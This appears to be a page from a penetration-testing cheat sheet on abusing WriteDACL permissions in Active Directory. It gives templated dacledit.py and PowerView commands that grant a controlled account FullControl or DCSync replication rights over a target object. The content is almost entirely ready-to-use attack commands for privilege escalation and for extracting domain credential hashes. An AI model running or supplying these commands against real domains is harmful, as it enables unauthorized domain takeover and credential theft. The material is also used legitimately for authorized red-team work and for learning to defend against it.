PRIMARY CATEGORY → DACL ABUSE

Theory

WriteDACL


Abuse - UNIX-like

Impacket’s DACLedit.py

DACLedit.py

Grant FullControl Right

GenericAll

dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights FullControl '<DOMAIN>/<USER>:<PASSWD>'

Grant DCSync Rights

DS-Replication-Get-Changes, DS-Replication-Get-Changes-All

dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights DCSync '<DOMAIN>/<USER>:<PASSWD>'

BloodyAD


Abuse - Windows

PowerView

PowerView.ps1

Grant FullControl Right

GenericAll

$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)
Add-DomainObjectACL -Credential $cred -Rights 'All' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'

Grant DCSync Rights

DS-Replication-Get-Changes, DS-Replication-Get-Changes-All

$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)
Add-DomainObjectACL -Credential $cred -Rights 'DCSync' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'